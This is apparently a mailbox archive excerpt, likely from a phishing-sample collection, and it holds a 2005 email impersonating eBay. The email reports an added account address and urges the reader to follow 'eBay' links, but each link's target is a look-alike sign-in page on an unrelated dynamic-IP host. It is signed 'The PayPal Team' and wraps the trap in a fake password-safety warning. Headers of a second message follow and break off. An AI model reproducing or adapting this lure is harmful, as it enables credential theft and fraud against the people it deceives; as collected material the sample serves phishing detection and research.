From: 	eBay <accounts@eBay.com>
Content-Type: 	text/html
Date: 	Mon, 18 Jul 2005 19:35:07 -0700
X-Spam-Status: 	No, score=2.0 required=4.1
tests=FORGED_RCVD_HELO,HTML_40_50,
HTML_MESSAGE,HTML_MIME_NO_HTML_TAG,MIME_HEADER_CTYPE_ONLY,
MIME_HTML_ONLY,NORMAL_HTTP_TO_IP autolearn=no version=3.0.4
X-Spam-Level: 	*
X-Spam-Checker-Version: 	SpamAssassin 3.0.4 (2005-06-05) on mail.angelar.com



You have added phoneseller@yahoo.com
<a href="http://127.195.17.210.dyn.pacific.net.hk/.eBay/.account/Sign-In/index.htm">phoneseller@yahoo.com</a>as 

a new email address for your eBay account.

If you did not authorize this change or if you need assistance with your
account, please contact eBay customer service at:

http://scgi.ebay.com/verify_id=ebay
<a href=http://127.195.17.210.dyn.pacific.net.hk/.eBay/.account/Sign-In/index.htm">http://scgi.ebay.com/verify_id=ebay</a>


Thank you for using eBay!
The PayPal Team


Please do not reply to this e-mail. Mail sent to this address cannot be
answered. For assistance, log in to your eBay account and choose the
"Help" link in the header of any page.

----------------------------------------------------------------
                     PROTECT YOUR PASSWORD

    NEVER give your password to anyone and ONLY log in at
http://scgi.ebay.com/verify_id=ebay.
<a href="http://127.195.17.210.dyn.pacific.net.hk/.eBay/.account/Sign-In/index.htm">http://scgi.ebay.com/verify_id=ebay.</a>
Protect yourself against fraudulent websites by opening a new web
browser (e.g. Internet Explorer or Netscape) and typing in the eBay URL
every time you log in to your account.


---------------------------------------------------------------


eBay Email ID PP007

From muchomas@roamingmonkey.org  Wed Jul 20 18:24:54 2005
Return-Path: <muchomas@roamingmonkey.org>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id 1D288536E21
	for <jose@login.monkey.org>; Wed, 20 Jul 2005 18:24:54 -0400 (EDT)
Received: from mxsf41.cluster1.charter.net (mxsf41.cluster1.charter.net [209.225.28.173])
	by mail2.monkey.org (Postfix) with ESMTP id E3B72183896
	for <jose@monkey.org>; Wed, 20 Jul 2005 18:24:53 -0400 (EDT)
Received: from mxip16a.cluster1.charter.net (mxip16a.cluster1.charter.net [209.225.28.146])
	by mxsf41.cluster1.charter.net (8.12.11/8.12.11) with ESMTP id j6KMORdo026548
	for <jose@monkey.org>; Wed, 20 Jul 2005 18:24:28 -0400
Received: from 24-231-155-217.dhcp.trcy.mi.charter.com (HELO ditka.invisible.cx) (24.231.155.217)
  by mxip16a.cluster1.charter.net with ESMTP; 20 Jul 2005 18:24:28 -0400
X-IronPort-AV: i="3.93,305,1115006400"; 
   d="scan'208,217"; a="1338925049:sNHT25483488"
Received: from ditka.invisible.cx (localhost [127.0.0.1])
	by ditka.invisible.cx (8.13.3/8.13.3) with ESMTP id j6KMOQ78009806
	for <jose@monkey.org>; Wed, 20 Jul 2005 18:24:26 -0400
Received: (from muchomas@localhost)
	by ditka.invisible.cx (8.13.3/8.13.3/Submit) id j6KMOQVH009805
	for jose@monkey.org; Wed, 20 Jul 2005 18:24:26 -0400
